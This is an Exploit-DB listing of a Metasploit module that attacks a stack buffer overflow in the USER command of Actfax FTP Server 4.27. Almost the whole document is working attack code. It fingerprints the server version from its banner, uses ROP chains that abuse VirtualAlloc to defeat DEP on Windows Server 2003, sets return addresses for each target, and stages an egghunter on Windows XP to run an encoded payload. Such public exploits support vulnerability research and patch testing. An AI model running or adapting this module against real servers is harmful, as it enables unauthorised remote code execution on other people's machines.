Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)

EDB-ID:

17588

CVE:



Author:

mr_me

Type:

remote


Platform:

Windows

Date:

2011-07-31


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = GreatRanking

        include Msf::Exploit::Remote::Ftp
        include Msf::Exploit::Remote::Egghunter

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Actfax FTP Server <= v4.27 USER Command Stack Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a stack-based buffer overflow in actfax ftp Server
                                version 4.27 and earlier. Actfax fails to check input size when parsing 'USER' command.
                                This vulnerability results in arbitray code execution. This module has been designed to
                                bypass DEP under Windows Server 2003 SP2/R2.
                        },
                        'Author'         =>
                                [
                                        'mr_me - twitter.com/net__ninja & mrme.mythsec<at>gmail.com',   # found/wrote msf module
                                        'chap0 - chap0.mythsec<at>gmail.com',                           # for the original versions
                                ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 12540 $',
                        'References'     =>
                                [
                                        [ 'OSVDB', '72520' ],
                                        [ 'URL', 'http://www.exploit-db.com/exploits/16177/' ]
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'thread'
                                },
                        'Privileged'     => false,
                        'Payload'        =>
                                {
                                        'Space'    => 600,
                                        'DisableNops' => true,
                                        'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        # Server 2003 DEP bypass targets (fully tested)
                                        [ 'Windows Server 2003 + DEP bypass - NTDLL v5.2.3790.4789',   { 'Ret' => 0x7C813C8F } ], # MOV ESP,EBP; POP EBP; RETN [ntdll.dll]
                                        [ 'Windows Server 2003 + DEP bypass - NTDLL v5.2.3790.3959',   { 'Ret' => 0x7C813DE7 } ], # MOV ESP,EBP; POP EBP; RETN [ntdll.dll]
                                        # NON DEP Bypass target (fully tested)
                                        [ 'Windows XP SP3 - Universal',   { 'Ret' => 0x004021C5 } ], # CALL EDI [ActSrvNT.exe]
                                ],
                        'DisclosureDate' => 'Jul 31 2011',
                        'DefaultTarget' => 0))

        end

        def check
                connect
                disconnect

                if (banner =~ /Version 4.27/ || banner =~ /Version 4.25/)
                        return Exploit::CheckCode::Vulnerable
                end
                        return Exploit::CheckCode::Safe
        end

        def get_encoded_payload(p, reg)
                encoder = framework.encoders.create("x86/alpha_mixed")
                encoder.datastore.import_options_from_hash( {'BufferRegister'=>reg} )
                rencoded_payload = encoder.encode(p, nil, nil, platform)
                return rencoded_payload
        end

        def junk
                return rand_text_alpha(4).unpack("L")[0].to_i
        end

        def exploit
                connect

                if (target.name =~ /Server 2003/)
                        sc = get_encoded_payload(payload.encoded, "ESP")

                        # specially aligned RETN
                        rop_stage1  = "\x42\x28\x5f"                    # RETN [htnetcfg.dll]
                        rop_stage1  += [0x5f282336].pack("V*") * 51     # RETN [htnetcfg.dll]

                        # All rop stage 1 instructions are from htnetcfg.dll
                        # Tested versions 5.2.3790.3959 &
                        # which seem to be universal across all windows server 2003 SP's
                        rop_stage1 +=
                        [
                                0x5F29C7F8,     # POP EAX; POP ESI; POP EBP; RETN 8
                                0x5F2B5DC3,     # ptr to 0x00001000
                                junk,           # JUNK
                                0x5f29aa95,     # p2p that is writable, we also -0c to accommodate
                                0x5F2A32DA,     # MOV EDX,DWORD PTR DS:[EAX]; JUNK; JUNK; JUNK; JUNK; JUNK; JUNK; RETN 8
                                junk,           # JUNK
                                junk,           # JUNK
                                junk,           # JUNK
                                0x5f282336,     # RETN
                                junk,           # JUNK
                                junk,           # JUNK
                        ].pack("V*")

                        # jump over the below stack alignment (Dont POP EDI)
                        rop_stage1 += [0x5F2A345D].pack("V*")   # POP ECX; POP EBP; RETN [htnetcfg.dll]

                        # rop_stage1 + stack_alignment to realign after retn address
                        rop_stage1 += rand_text_alpha(1)
                        stack_alignment = rand_text_alpha(3)

                        # We have to be smart on how we use gadgets.
                        # Almost a universal dep bypass as most ptrs are from "ActSrvNT.exe".
                        # We can use null bytes 0x00 due to character conversion of 0x20!
                        # Also, we waste ~208 bytes in payload space but thanks to nulls, we are saved!
                        # EDX already contains = 1000 from flAllocationType (rop_stage1)
                        rop_stage2 =
                        [
                                0x204C2135,     # POP EAX; RETN
                                0x2051E1B0,     # IAT -> VirtualAlloc
                                0x2051D7A1,     # MOV EAX,DWORD PTR DS:[EAX]; RETN
                                0x2040A4A0,     # POP EBX; RETN
                                0x2040A4A0,     # POP EBX; RETN
                                0x20422E7D,     # MOV ESI,EAX; CALL EBX
                                0x2040F2c2,     # POP EBP; POP EBX; RETN
                                0x204A5DED,     # JMP ESP
                                0x20202120,     # dwSize
                                0x204C2135,     # POP EAX; RETN
                                0x44444444,     # INC ESP before sc (getPC)
                                0x20415D7A,     # POP EDI; POP ECX; RETN
                                0x20404A3F,     # RETN
                                0x20202040,     # flProtect
                                0x2045AB53,     # PUSHAD; RETN
                        ].pack("V*")

                        print_status("Targeting %s" % target.name)
                        sploit = rop_stage1
                        sploit << [target.ret].pack("V")
                        sploit << stack_alignment
                        sploit << rop_stage2
                        sploit << sc
                        sploit << rand_text_alpha((990-sploit.length))

                else
                        eggoptions =
                        {
                                :checksum => false,
                                :eggtag => 'lulz',
                        }

                        # double encoded msf shellcode trick
                        sc = get_encoded_payload(payload.encoded, "EDI")
                        hunter,egg = generate_egghunter(sc, nil, eggoptions)

                        # encode our hunter
                        hunter = get_encoded_payload(hunter, "EDI")
                        print_status("Targeting %s" % target.name)
                        print_status("Sending stage 1 exploit buffer...")
                        send_cmd(['USER', 'anonymous'], true)
                        send_cmd(['PASS', egg], false)

                        sploit = hunter
                        sploit << rand_text_alpha(256-sploit.length)
                        sploit << [target.ret].pack("V")

                        # connect again ;)
                        connect
                end

                # profit
                send_cmd(['USER', sploit] , false)
                handler
                disconnect

        end

end